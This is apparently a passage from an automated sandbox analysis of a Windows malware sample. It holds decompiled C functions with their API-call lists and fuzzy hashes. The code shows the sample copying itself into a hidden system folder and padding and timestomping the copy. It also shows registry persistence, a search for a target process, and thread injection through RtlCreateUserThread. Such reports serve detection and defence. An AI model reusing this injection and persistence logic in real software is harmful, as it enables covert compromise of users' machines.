    								_t98 =  *0x412af8; // 0x0
    								_t170 =  *0x412a64; // 0x246f5a8
    								_t101 = E00409968( *((intOrPtr*)(_t170 + (_t98 & 0x00000001 | 0x00000002) * 8))); // executed
    								_t174 = _t101;
    								_t178 = E0040605C;
    								while(1) {
    									_t105 = E00406DC4(0, _t170, _t178 -  *0x412bac, _t174); // executed
    									__eflags = _t105;
    									if(_t105 != 0) {
    										break;
    									}
    									Sleep(0x14); // executed
    								}
    								while(1) {
    									_t106 =  *0x412a64; // 0x246f5a8
    									_t107 = E00409241( *((intOrPtr*)(_t106 + 0x28)));
    									__eflags = _t107;
    									if(_t107 != 0) {
    										break;
    									}
    									Sleep(0x14);
    								}
    								L47:
    								goto L48;
    							}
    							__eflags = _v13;
    							if(__eflags != 0) {
    								_t108 =  *0x412a64; // 0x246f5a8
    								E00409266(__eflags,  *((intOrPtr*)(_t108 + 0x2c)), 0xa, 0, 0, 0, 0);
    							}
    							goto L47;
    						}
    						E00409B88(); // executed
    						E0040DD3C( &_v572);
    						CopyFileW( &_v1092,  &_v572, 0); // executed
    						SetFileAttributesW( &_v572, 0x26); // executed
    						_t119 = CreateFileW( &_v572, 0x40000000, 1, 0, 3, 0, 0); // executed
    						_v12 = _t119;
    						__eflags = _t119 - 0xffffffff;
    						if(_t119 == 0xffffffff) {
    							L36:
    							SetFileAttributesW( &_v572, 0x21); // executed
    							goto L38;
    						}
    						_t122 = SetFilePointer(_t119, 0, 0, 2); // executed
    						__eflags = _t122;
    						if(_t122 == 0) {
    							L33:
    							 *0x412a6c(0,  &_v1092, 0x25, 1);
    							_t125 =  *0x412a64; // 0x246f5a8
    							PathCombineW( &_v1092,  &_v1092,  *(_t125 + 0x5c));
    							_t129 = CreateFileW( &_v1092, 0x80000000, 3, 0, 3, 0, 0); // executed
    							_t180 = _t129;
    							__eflags = _t180 - 0xffffffff;
    							if(_t180 != 0xffffffff) {
    								GetFileTime(_t180,  &_v36,  &_v52,  &_v44);
    								SetFileTime(_v12,  &_v36,  &_v52,  &_v44); // executed
    								FindCloseChangeNotification(_t180); // executed
    							}
    							CloseHandle(_v12);
    							goto L36;
    						}
    						_t142 = E0040DF51(0x400, 0x40) << 9;
    						_v20 = _t142;
    						__eflags = _t142;
    						if(_t142 == 0) {
    							_t175 = 0;
    							__eflags = 0;
    						} else {
    							_t175 = E0040CF2D(_t142);
    							_t142 = _v20;
    						}
    						__eflags = _t175;
    						if(_t175 == 0) {
    							goto L33;
    						} else {
    							_t181 = 0;
    							__eflags = _t142;
    							if(_t142 <= 0) {
    								L32:
    								_t170 =  &_v20;
    								WriteFile(_v12, _t175, _t142,  &_v20, 0); // executed
    								FlushFileBuffers(_v12);
    								E0040CF40(_t175);
    								goto L33;
    							} else {
    								goto L31;
    							}
    							do {
    								L31:
    								 *((char*)(_t181 + _t175)) = E0040DF51(E0040DF51(0xff, 1), 0);
    								_t142 = _v20;
    								_t181 = _t181 + 1;
    								__eflags = _t181 - _t142;
    							} while (_t181 < _t142);
    							goto L32;
    						}
    					}
    					_t150 =  *0x412a64; // 0x246f5a8
    					_t151 = E00409266(__eflags,  *((intOrPtr*)(_t150 + 0x2c)), 1, 0, 0, 0, 0);
    					__eflags = _v12 & 0x00000001;
    					if(__eflags != 0) {
    						L16:
    						_t154 =  *0x412a64; // 0x246f5a8
    						_v12 = 0;
    						E00409266(__eflags,  *((intOrPtr*)(_t154 + 0x2c)), 0xb,  &_v12,  &_v20, 0, 0);
    						_t156 =  *0x412a64; // 0x246f5a8
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(0);
    						__eflags = _v5;
    						if(__eflags == 0) {
    							_push(3);
    							_push( *((intOrPtr*)(_t156 + 0x2c)));
    							E00409266(__eflags);
    							while(1) {
    								_t158 =  *0x412a64; // 0x246f5a8
    								_t159 = E00409241( *((intOrPtr*)(_t158 + 0x2c)));
    								__eflags = _t159;
    								if(_t159 == 0) {
    									break;
    								}
    								Sleep(0x14);
    							}
    							L21:
    							_v13 = 1;
    							__eflags = _v12;
    							if(_v12 != 0) {
    								E0040DD3C(_v12);
    								E0040CF40(_v12);
    							}
    							goto L23;
    						}
    						_push(9);
    						_push( *((intOrPtr*)(_t156 + 0x2c)));
    						E00409266(__eflags);
    						goto L21;
    					}
    					__eflags = _t151 - 0x1020500;
    					if(__eflags < 0) {
    						goto L16;
    					}
    					CloseHandle(_v24);
    					ExitProcess(0);
    				} else {
    					_t164 = E0040D3C6(_t172);
    					_t170 =  &_v28;
    					_t165 = E0040D20F(_t164,  &_v28, _t172);
    					__eflags = _t165;
    					if(_t165 <= 0) {
    						goto L11;
    					}
    					_t176 = _v28;
    					_t172 = 0;
    					__eflags = _t165;
    					if(_t165 <= 0) {
    						L10:
    						E0040CF5C(_t165, _t176);
    						goto L11;
    					} else {
    						goto L5;
    					}
    					do {
    						L5:
    						_t170 =  *((intOrPtr*)(_t176 + _t172 * 4));
    						__eflags =  *_t170 - 0x2d;
    						if( *_t170 == 0x2d) {
    							__eflags =  *((char*)(_t170 + 1)) - 0x66;
    							if( *((char*)(_t170 + 1)) == 0x66) {
    								__eflags =  *(_t170 + 2);
    								if( *(_t170 + 2) == 0) {
    									_t8 =  &_v12;
    									 *_t8 = _v12 | 0x00000001;
    									__eflags =  *_t8;
    								}
    							}
    						}
    						_t172 = _t172 + 1;
    						__eflags = _t172 - _t165;
    					} while (_t172 < _t165);
    					goto L10;
    				}
    			}

    APIs
    • GetCommandLineA.KERNEL32 ref: 004058BA
    • CreateMutexW.KERNELBASE(00413468,00000001,?), ref: 00405912
    • GetLastError.KERNEL32 ref: 0040591B
    • CloseHandle.KERNEL32(?,?,00000001,00000000,00000000,00000000,00000000,?), ref: 0040596F
    • ExitProcess.KERNEL32 ref: 00405976
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseCommandCreateErrorExitHandleLastLineMutexProcess
    • String ID:
    • API String ID: 1529117804-0
    • Opcode ID: 21562199e360a4611aaa55f51b2fff2ebf0b0e195522c38ad02755bb6eb961cc
    • Instruction ID: afdad43edc00b5aade342eed858396e47c74ad5f2c68885408167c6f2e92136a
    • Opcode Fuzzy Hash: 21562199e360a4611aaa55f51b2fff2ebf0b0e195522c38ad02755bb6eb961cc
    • Instruction Fuzzy Hash: 79B16271900208AFDB21ABA0DD85EEF7B7DEF04304F00857AF601F61A1DB789E558B69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E00409968(WCHAR* _a4) {
    				long _v8;
    				char _v520;
    				short _v522;
    				short _v524;
    				short _v526;
    				char _v528;
    				short _v1048;
    				long _v1076;
    				void* _v1084;
    				short _v1604;
    				short _v2124;
    				short _v2644;
    				short _v3164;
    				void* _t37;
    				intOrPtr _t38;
    				signed int _t41;
    				struct tagPROCESSENTRY32W* _t47;
    				void* _t53;
    				WCHAR* _t59;
    				void* _t62;
    				long _t68;
    				int _t74;
    				void* _t76;
    				void* _t78;
    				void* _t80;
    
    				_t37 = CreateToolhelp32Snapshot(2, 0); // executed
    				_t76 = _t37;
    				if(_t76 != 0xffffffff) {
    					_v8 = 0x103;
    					if(( *0x412af8 & 0x00000001) == 0) {
    						_t38 =  *0x412a64; // 0x246f5a8
    						lstrcpyW( &_v1604,  *(_t38 + 0x1c));
    					} else {
    						_t74 = GetUserNameW( &_v1604,  &_v8);
    						if(_t74 == 0) {
    							_v1604 = _t74;
    						}
    					}
    					_t41 =  *0x412af8; // 0x0
    					_v8 = 0;
    					 *0x412a6c(0,  &_v3164,  !_t41 & 0x00000001 | 0x00000024, 1, _t78); // executed
    					_t47 =  &_v1084;
    					_v1084 = 0x22c;
    					Process32FirstW(_t76, _t47); // executed
    					while(_t47 != 0) {
    						if(lstrcmpiW( &_v1048, _a4) != 0) {
    							L22:
    							_t47 = Process32NextW(_t76,  &_v1084); // executed
    							continue;
    						}
    						_t80 = OpenProcess(0x410, 0, _v1076);
    						if(_t80 == 0) {
    							goto L22;
    						}
    						_t53 =  *0x412ba8(_t80, 0,  &_v528, 0x104); // executed
    						if(_t53 == 0) {
    							L21:
    							CloseHandle(_t80);
    							goto L22;
    						}
    						PathCombineW( &_v2124,  &_v3164, _a4);
    						if(_v528 != 0x5c || _v526 != 0x3f || _v524 != 0x3f || _v522 != 0x5c) {
    							_push( &_v2124);
    							_t59 =  &_v528;
    						} else {
    							_push( &_v2124);
    							_t59 =  &_v520;
    						}
    						if(lstrcmpiW(_t59, ??) != 0) {
    							goto L21;
    						} else {
    							if(_v8 == 0) {
    								_v8 = _v1076;
    							}
    							_t62 = E00409FAD(_t80,  &_v2644); // executed
    							if(_t62 == 0 || lstrcmpiW( &_v2644,  &_v1604) != 0) {
    								goto L21;
    							} else {
    								CloseHandle(_t80);
    								CloseHandle(_t76);
    								_t68 = _v1076;
    								L25:
    								return _t68;
    							}
    						}
    					}
    					CloseHandle(_t76);
    					_t68 = _v8;
    					goto L25;
    				}
    				return 0;
    			}

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409978
    • GetUserNameW.ADVAPI32(?,00000103), ref: 004099A7
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000001,?,?,00000000), ref: 004099EB
    • Process32FirstW.KERNEL32(00000000,?), ref: 00409A03
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00409B19
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00409B2A
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00409B31
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandle$CreateFirstFolderNamePathProcess32SnapshotSpecialToolhelp32User
    • String ID: ?$?$\$\
    • API String ID: 4249123633-2781376886
    • Opcode ID: c5cc35fa6dd9ffb52e5b7d73a40d5d0a8744a857888055b738d413ef26afa481
    • Instruction ID: cb4bd758d5f8b56318b6ec2644b8e39d8aafbc65a56d4eb30de1ad57ed799c34
    • Opcode Fuzzy Hash: c5cc35fa6dd9ffb52e5b7d73a40d5d0a8744a857888055b738d413ef26afa481
    • Instruction Fuzzy Hash: 35513371900119ABDB219FA0DD48EDEB7BCFB44314F0081A6E615E2191EBB89E94CF68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0040597C() {
    				DWORD* _t47;
    				int _t52;
    				signed int _t55;
    				void* _t58;
    				void* _t62;
    				DWORD* _t63;
    				void* _t64;
    				DWORD* _t67;
    				void* _t78;
    				long _t81;
    				DWORD* _t84;
    				void* _t88;
    				long _t101;
    				struct _OVERLAPPED* _t109;
    				void* _t111;
    				void* _t112;
    				void* _t113;
    				void* _t114;
    				void* _t116;
    				void* _t117;
    				void* _t118;
    
    				GetModuleFileNameW(_t109, _t118 - 0x440, 0x104);
    				E0040966F(_t118 - 0x238);
    				_t47 =  *0x412a64; // 0x246f5a8
    				PathCombineW(_t118 - 0x238, _t118 - 0x238, _t47[3]);
    				_t52 = lstrcmpiW(_t118 - 0x440, _t118 - 0x238);
    				_push(_t118 - 0x238);
    				if(_t52 == 0) {
    					 *(_t118 - 1) = _t109;
    					E00409B88();
    					goto L16;
    				} else {
    					E00409B88(); // executed
    					E0040DD3C(_t118 - 0x238);
    					CopyFileW(_t118 - 0x440, _t118 - 0x238, _t109); // executed
    					SetFileAttributesW(_t118 - 0x238, 0x26); // executed
    					_t78 = CreateFileW(_t118 - 0x238, 0x40000000, 1, _t109, 3, _t109, _t109); // executed
    					 *(_t118 - 8) = _t78;
    					if(_t78 == 0xffffffff) {
    						L14:
    						SetFileAttributesW(_t118 - 0x238, 0x21); // executed
    						L16:
    						if( *(_t118 - 1) == _t109) {
    							_t55 =  *0x412af8; // 0x0
    							_t110 =  *0x412a64; // 0x246f5a8
    							_t58 = E00409968( *((intOrPtr*)(_t110 + (_t55 & 0x00000001 | 0x00000002) * 8))); // executed
    							_t112 = _t58;
    							_t114 = E0040605C;
    							while(1) {
    								_t62 = E00406DC4(0, _t110, _t114 -  *0x412bac, _t112); // executed
    								__eflags = _t62;
    								if(_t62 != 0) {
    									break;
    								}
    								Sleep(0x14); // executed
    							}
    							while(1) {
    								_t63 =  *0x412a64; // 0x246f5a8
    								_t64 = E00409241(_t63[0xa]);
    								__eflags = _t64;
    								if(_t64 != 0) {
    									break;
    								}
    								Sleep(0x14);
    							}
    							L25:
    							if( *(_t118 - 0x14) != _t109) {
    								CloseHandle( *(_t118 - 0x14));
    							}
    							E0040FB22(_t110, _t111);
    							ExitProcess(_t109);
    						}
    						_t128 =  *((intOrPtr*)(_t118 - 9)) - _t109;
    						if( *((intOrPtr*)(_t118 - 9)) != _t109) {
    							_t67 =  *0x412a64; // 0x246f5a8
    							E00409266(_t128, _t67[0xb], 0xa, _t109, _t109, _t109, _t109);
    						}
    						goto L25;
    					}
    					_t81 = SetFilePointer(_t78, _t109, _t109, 2); // executed
    					if(_t81 == 0) {
    						L11:
    						 *0x412a6c(_t109, _t118 - 0x440, 0x25, 1);
    						_t84 =  *0x412a64; // 0x246f5a8
    						PathCombineW(_t118 - 0x440, _t118 - 0x440, _t84[0x17]);
    						_t88 = CreateFileW(_t118 - 0x440, 0x80000000, 3, _t109, 3, _t109, _t109); // executed
    						_t116 = _t88;
    						if(_t116 != 0xffffffff) {
    							GetFileTime(_t116, _t118 - 0x20, _t118 - 0x30, _t118 - 0x28);
    							SetFileTime( *(_t118 - 8), _t118 - 0x20, _t118 - 0x30, _t118 - 0x28); // executed
    							FindCloseChangeNotification(_t116); // executed
    						}
    						CloseHandle( *(_t118 - 8));
    						goto L14;
    					}
    					_t101 = E0040DF51(0x400, 0x40) << 9;
    					 *(_t118 - 0x10) = _t101;
    					if(_t101 == _t109) {
    						_t113 = 0;
    						__eflags = 0;
    					} else {
    						_t113 = E0040CF2D(_t101);
    						_t101 =  *(_t118 - 0x10);
    					}
    					if(_t113 == _t109) {
    						goto L11;
    					} else {
    						_t117 = 0;
    						if(_t101 <= _t109) {
    							L10:
    							_t110 = _t118 - 0x10;
    							WriteFile( *(_t118 - 8), _t113, _t101, _t118 - 0x10, _t109); // executed
    							FlushFileBuffers( *(_t118 - 8));
    							E0040CF40(_t113);
    							goto L11;
    						} else {
    							goto L9;
    						}
    						do {
    							L9:
    							 *((char*)(_t117 + _t113)) = E0040DF51(E0040DF51(0xff, 1), _t109);
    							_t101 =  *(_t118 - 0x10);
    							_t117 = _t117 + 1;
    						} while (_t117 < _t101);
    						goto L10;
    					}
    				}
    			}

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 00405A00
      • Part of subcall function 0040966F: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,00405A11,?,?), ref: 00409690
    • PathCombineW.SHLWAPI(?,?,?,?,?), ref: 00405A21
    • lstrcmpiW.KERNEL32(?,?,?,?), ref: 00405A35
    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,?), ref: 00405A6A
    • SetFileAttributesW.KERNELBASE(?,00000026,?,?), ref: 00405A79
    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00405A92
    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,?), ref: 00405AA9
    • WriteFile.KERNELBASE(?,00000000,00000000,?,00000000,00000040,?,?), ref: 00405B08
    • FlushFileBuffers.KERNEL32(?,?,?), ref: 00405B11
      • Part of subcall function 0040CF2D: RtlAllocateHeap.NTDLL(00000008,?,0040952C), ref: 0040CF39
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000001,?,?), ref: 00405B29
    • PathCombineW.SHLWAPI(?,?,?,?,?), ref: 00405B3F
    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?), ref: 00405B58
    • GetFileTime.KERNEL32(00000000,?,?,?,?,?), ref: 00405B72
    • SetFileTime.KERNELBASE(?,?,?,?,?,?), ref: 00405B87
    • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 00405B8E
    • CloseHandle.KERNEL32(?,?,?), ref: 00405B97
    • SetFileAttributesW.KERNELBASE(?,00000021,?,?), ref: 00405BA6
    • Sleep.KERNELBASE(00000014,-0000CB50,00000000,0246F5A8,?,?,?), ref: 00405BF9
    • Sleep.KERNEL32(00000014,?,-0000CB50,00000000,?,?), ref: 00405C18
    • CloseHandle.KERNEL32(?), ref: 00405C38
    • ExitProcess.KERNEL32 ref: 00405C44
      • Part of subcall function 00409B88: RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,00000003,00000000,?,00000000,?,?,00000000,?), ref: 00409BBA
      • Part of subcall function 00409B88: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 00409BDD
      • Part of subcall function 00409B88: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 00409C16
      • Part of subcall function 00409B88: StrCmpNIW.SHLWAPI(00000002,?,?,?,?,00000000,?), ref: 00409C40
      • Part of subcall function 00409B88: RegCloseKey.KERNELBASE(?,?,?,00000000,?), ref: 00409CC2
      • Part of subcall function 0040DD3C: SetFileAttributesW.KERNELBASE(?,00000020,0040FBDD,?,?,?,00000000), ref: 0040DD42
      • Part of subcall function 0040DD3C: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 0040DD4C
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$ClosePath$AttributesCreate$CombineFolderHandleQuerySleepSpecialTimeValue$AllocateBuffersChangeCopyDeleteExitFindFlushHeapModuleNameNotificationPointerProcessWritelstrcmpi
    • String ID:
    • API String ID: 33030036-0
    • Opcode ID: 33bf17ffe01c7c61b2d112e788ced53d0e1631e07169bc4169b04aef3f45d040
    • Instruction ID: 8ee4a0294598f7fd352a5862a8919ac9f8de53975faecc9989b95bdeb2ef82e4
    • Opcode Fuzzy Hash: 33bf17ffe01c7c61b2d112e788ced53d0e1631e07169bc4169b04aef3f45d040
    • Instruction Fuzzy Hash: 0A512EB2900219AFDB21ABA0DD88EEF777CEB04304F004576F215F61A1DB789E558F69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 97%
    			E00409B88(WCHAR* _a4) {
    				int _v8;
    				void* _v12;
    				int _v16;
    				intOrPtr _t45;
    				long _t46;
    				intOrPtr _t48;
    				intOrPtr _t52;
    				int _t55;
    				intOrPtr _t59;
    				signed int _t61;
    				intOrPtr _t71;
    				signed int _t72;
    				short _t74;
    				int _t76;
    				char* _t77;
    				WCHAR* _t82;
    				int _t84;
    				char* _t85;
    				signed int _t87;
    				signed int _t88;
    
    				_t76 = 0;
    				_t84 = E0040D3D8(_a4);
    				_t45 =  *0x412a64; // 0x246f5a8
    				_v16 = _t84;
    				_t46 = RegCreateKeyExW(0x80000002,  *(_t45 + 0x3c), 0, 0, 0, 3, 0,  &_v12, 0); // executed
    				if(_t46 != 0) {
    					L19:
    					_t39 = _t84 + 2; // 0x2
    					_t48 =  *0x412a64; // 0x246f5a8
    					_t76 = E004075A2(0x80000001,  *((intOrPtr*)(_t48 + 0x40)),  *((intOrPtr*)(_t48 + 0x44)), 1, _a4, _t84 + _t39);
    				} else {
    					_t52 =  *0x412a64; // 0x246f5a8
    					_v8 = 0;
    					RegQueryValueExW(_v12,  *(_t52 + 0x44), 0, 0, 0,  &_v8); // executed
    					_t55 = _v8 + 0xa + _t84 * 2;
    					_v8 = _t55;
    					if(_t55 != 0) {
    						_t85 = E0040CF2D(_t55);
    						if(_t85 != 0) {
    							_t59 =  *0x412a64; // 0x246f5a8
    							RegQueryValueExW(_v12,  *(_t59 + 0x44), 0, 0, _t85,  &_v8); // executed
    							_t77 = _t85;
    							_t82 = _t85;
    							while(1) {
    								_t61 =  *_t77 & 0x0000ffff;
    								if(_t61 == 0 || _t61 == 0x2c) {
    									goto L6;
    								}
    								L9:
    								if( *_t77 == 0) {
    									_t87 = E0040D3D8(_t85);
    									if(_t87 > 0 && _t85[_t87 * 2 - 2] != 0x2c) {
    										_t74 = 0x2c;
    										 *(_t85 + _t87 * 2) = _t74;
    										_t87 = _t87 + 1;
    									}
    									lstrcpyW(_t85 + _t87 * 2, _a4);
    									_t88 = _t87 + _v16;
    									lstrcpyW(_t85 + _t88 * 2, ",");
    									_t71 =  *0x412a64; // 0x246f5a8
    									_t72 = RegSetValueExW(_v12,  *(_t71 + 0x44), 0, 1, _t85, _t88 + _t88 + 4); // executed
    									asm("sbb bl, bl");
    									_t76 =  ~_t72 + 1;
    								} else {
    									_t77 =  &(_t77[2]);
    									continue;
    								}
    								L16:
    								E0040CF40(_t85);
    								goto L17;
    								L6:
    								if(_t77 - _t82 >> 1 != _v16 || StrCmpNIW(_t82, _a4, _v16) != 0) {
    									_t20 =  &(_t77[2]); // 0x4
    									_t82 = _t20;
    									goto L9;
    								} else {
    									_t76 = 1;
    								}
    								goto L16;
    							}
    						}
    					}
    					L17:
    					RegCloseKey(_v12); // executed
    					if(_t76 == 0) {
    						_t84 = _v16;
    						goto L19;
    					}
    				}
    				return _t76;
    			}

    APIs
    • RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,00000003,00000000,?,00000000,?,?,00000000,?), ref: 00409BBA
    • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 00409BDD
    • RegCloseKey.KERNELBASE(?,?,?,00000000,?), ref: 00409CC2
      • Part of subcall function 0040CF2D: RtlAllocateHeap.NTDLL(00000008,?,0040952C), ref: 0040CF39
    • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 00409C16
    • StrCmpNIW.SHLWAPI(00000002,?,?,?,?,00000000,?), ref: 00409C40
    • lstrcpyW.KERNEL32(00000000,?), ref: 00409C7E
    • lstrcpyW.KERNEL32(00000000,004035CC), ref: 00409C90
    • RegSetValueExW.KERNELBASE(?,?,00000000,00000001,00000000,?,?,?,00000000,?), ref: 00409CAB
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Value$Querylstrcpy$AllocateCloseCreateHeap
    • String ID:
    • API String ID: 1578894565-0
    • Opcode ID: 4d5d90abaaafb1b023e0fc1cc6612c25230f583f733929d8fc14a37bc5d1eb55
    • Instruction ID: 6d28c95369a48019a3001f0bd64e3a18302ed4b8ca86750bd618c426f1ae961e
    • Opcode Fuzzy Hash: 4d5d90abaaafb1b023e0fc1cc6612c25230f583f733929d8fc14a37bc5d1eb55
    • Instruction Fuzzy Hash: B741AE36900115FFDB209B95CD48EEE7FB9EF05740B008066F505E72A1D7759A60CBA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00409FAD(long _a4, union _SID_NAME_USE _a8) {
    				void* _v8;
    				short _v528;
    				int _t26;
    				int _t32;
    				union _TOKEN_INFORMATION_CLASS _t33;
    				void* _t35;
    
    				_t33 = 0;
    				if(OpenProcessToken(_a4, 8,  &_v8) != 0) {
    					_a4 = 0;
    					GetTokenInformation(_v8, 1, 0, 0,  &_a4); // executed
    					_t22 = _a4;
    					if(_a4 != 0) {
    						_t35 = E0040CF2D(_t22);
    						if(_t35 != 0) {
    							_t26 = GetTokenInformation(_v8, 1, _t35, _a4,  &_a4); // executed
    							if(_t26 != 0) {
    								_a4 = 0x103;
    								_t32 = LookupAccountSidW(0,  *_t35, _a8,  &_a4,  &_v528,  &_a4,  &_a8); // executed
    								if(_t32 != 0) {
    									_t33 = 1;
    								}
    							}
    							E0040CF40(_t35);
    						}
    					}
    					FindCloseChangeNotification(_v8); // executed
    				}
    				return _t33;
    			}

    APIs
    • OpenProcessToken.ADVAPI32(?,00000008,00000000,00000000), ref: 00409FC2
    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00409FDA
    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040A040
      • Part of subcall function 0040CF2D: RtlAllocateHeap.NTDLL(00000008,?,0040952C), ref: 0040CF39
    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?,00000000), ref: 0040A000
    • LookupAccountSidW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 0040A02A
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Token$Information$AccountAllocateChangeCloseFindHeapLookupNotificationOpenProcess
    • String ID:
    • API String ID: 3037326660-0
    • Opcode ID: bf001143671df6213e7da5d7fb84f9aed90da88c7777e9060486259687600fed
    • Instruction ID: 99342f0340d474e00ae288eb69932813939a730ba8887bc0699888d773cf2937
    • Opcode Fuzzy Hash: bf001143671df6213e7da5d7fb84f9aed90da88c7777e9060486259687600fed
    • Instruction Fuzzy Hash: 7C11DD7610020CBFDB219F90DD85EDF7BADEF04380F108136B905EA191D775DA549BA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00406DC4(void* __eax, void* __ecx, intOrPtr _a4, long _a8) {
    				char _v5;
    				char _v6;
    				void* _t11;
    				intOrPtr _t12;
    				void* _t23;
    
    				_t23 = __eax;
    				_v5 = 1;
    				_v6 = 0;
    				if(__eax != 0) {
    					L4:
    					_t11 = E00406689(_t23); // executed
    					if(_t11 != 0 && RtlCreateUserThread(_t23, 0, 0, 0, 0, 0, _t11 + _a4, 0, 0, 0) == 0) {
    						_v6 = 1;
    					}
    					if(_v5 == 0) {
    						FindCloseChangeNotification(_t23); // executed
    					}
    					_t12 = _v6;
    				} else {
    					_v5 = 0;
    					if(_a8 == 0) {
    						L3:
    						_t12 = 0;
    					} else {
    						_t23 = OpenProcess(0x43a, 0, _a8);
    						if(_t23 != 0) {
    							goto L4;
    						} else {
    							goto L3;
    						}
    					}
    				}
    				return _t12;
    			}

    APIs
    • OpenProcess.KERNEL32(0000043A,00000000,?,0040605C,00000000,?,?,00405C10,-0000CB50,00000000,0246F5A8,?,?,?), ref: 00406DEA
    • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00406E13
    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,0040605C,00000000,?,?,00405C10,-0000CB50,00000000,0246F5A8,?,?,?), ref: 00406E27
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: ChangeCloseCreateFindNotificationOpenProcessThreadUser
    • String ID:
    • API String ID: 307445780-0
    • Opcode ID: b2196cc7b70a747e3e9d0d8dbe1991aa683add7a991206fe8cd9dad19a738dd0
    • Instruction ID: 9cff67a7de51c08ebb4d54696f35b71653abbf044425d0da1cacd91edba2ed74
    • Opcode Fuzzy Hash: b2196cc7b70a747e3e9d0d8dbe1991aa683add7a991206fe8cd9dad19a738dd0
    • Instruction Fuzzy Hash: 6C01D475504298BEDB115FA4CC85AEF7F6CDF16348B05807AEA42A2240D57D4D1583A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040DD3C(WCHAR* _a4) {
    				signed int _t6;
    
    				SetFileAttributesW(_a4, 0x20); // executed
    				_t6 = DeleteFileW(_a4); // executed
    				return _t6 & 0xffffff00 | _t6 != 0x00000000;
    			}

    APIs
    • SetFileAttributesW.KERNELBASE(?,00000020,0040FBDD,?,?,?,00000000), ref: 0040DD42
    • DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 0040DD4C
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$AttributesDelete
    • String ID:
    • API String ID: 2910425767-0
    • Opcode ID: 18ad8fa84f13e70ee676bcf07f0193b867c792d33b0cb2a9c81311357d682747
    • Instruction ID: dbe5fead099cb67c7076b3957739c9df6c4ef7b2d947c40954e13fccb5770d29
    • Opcode Fuzzy Hash: 18ad8fa84f13e70ee676bcf07f0193b867c792d33b0cb2a9c81311357d682747
    • Instruction Fuzzy Hash: 6AC04831204201ABD6411B20DE4AB4EBEAABF94B41F04C438B245C40B0EBB189B0AB49
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,00405A11,?,?), ref: 00409690
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FolderPathSpecial
    • String ID:
    • API String ID: 994120019-0
    • Opcode ID: cc939c4c6eb5290adce94b212c3e0db36053c86202c439b57d3366095abac454
    • Instruction ID: 4c9e5333b0bb21662b4f4683e8a935341a57244265424c402ab03a78b2fd3571
    • Opcode Fuzzy Hash: cc939c4c6eb5290adce94b212c3e0db36053c86202c439b57d3366095abac454
    • Instruction Fuzzy Hash: EAD012B1A245105FFB0C4724DD7BBB53354DF14761F05431CB617CE5E0E6D528509728
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040CF2D(void* __eax) {
    				void* _t3;
    
    				_t3 = RtlAllocateHeap( *0x413e5c, 8, __eax + 4); // executed
    				return _t3;
    			}

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,0040952C), ref: 0040CF39
    Memory Dump Source
